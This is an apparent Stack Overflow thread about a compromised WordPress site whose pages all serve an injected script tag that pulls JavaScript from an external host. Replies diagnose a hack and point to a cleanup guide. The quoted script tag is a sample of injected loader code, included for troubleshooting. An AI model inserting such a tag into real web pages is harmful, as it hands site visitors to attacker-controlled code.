# Wordpress - instance always generates page that switches to external site

Tags: wordpress

I'm getting an issue where WordPress always serves me a page that takes me to an external site.

Whether I try to visit a URL on mylivesite.com, page content is always as follows (keyword= varies according to the URL I type in):

```
<nofollow><noindex>
<script src="http://externalsite.com/?jquery&source=mylivesite.com&
keyword=ksjdhskjfhjksfsdf"></script></noindex></nofollow>
```

This happens only on the live site and not on my localhost site (which should be a very close copy of the live site).

- I looked through the MySQL database using string search and couldn't find
  any matches to externalsite.com.
- I grep'ed the entire tree of hosted files and no matches either.
- Can't see any nefarious looking rules in
  wp_options.rewrite_rules.
- Tried to disable all plugins (except W3TC) by renaming directories within wp-content/plugins, which I think has worked.
- .htaccess is the standard WordPress bootstrap.

The installation is an individual domain running its own instance of WP.

This effect prevents me accessing wp-admin on the live site.

Any ideas about what layer or setting might cause this to happen?

Comment: seems similar to http://stackoverflow.com/questions/37870919/site-link-redirects-to-unknown-site....btw the link can be dynamically generated or disguised

Comment: Thanks David. I'm going to look into that. I'd convinced myself it was something that got cut and pasted by a developer from another site they were working in, and the code got commingled. But a hack is another explanation that makes sense.

Comment: You can also check external js files.

Comment: Thanks to all who contributed to leads for my question. It turned out the site had a bunch of malware lurking throughout the Wordpress system files. After cleaning, it started working as expected. That scenario hadn't occurred to me until we started this dialog.

Answer (score 0, accepted):

The site had been hacked. This was causing it to redirect to an external site after most page requests.

Cleanup guide for hacked sites: http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

Thanks to all who provided help.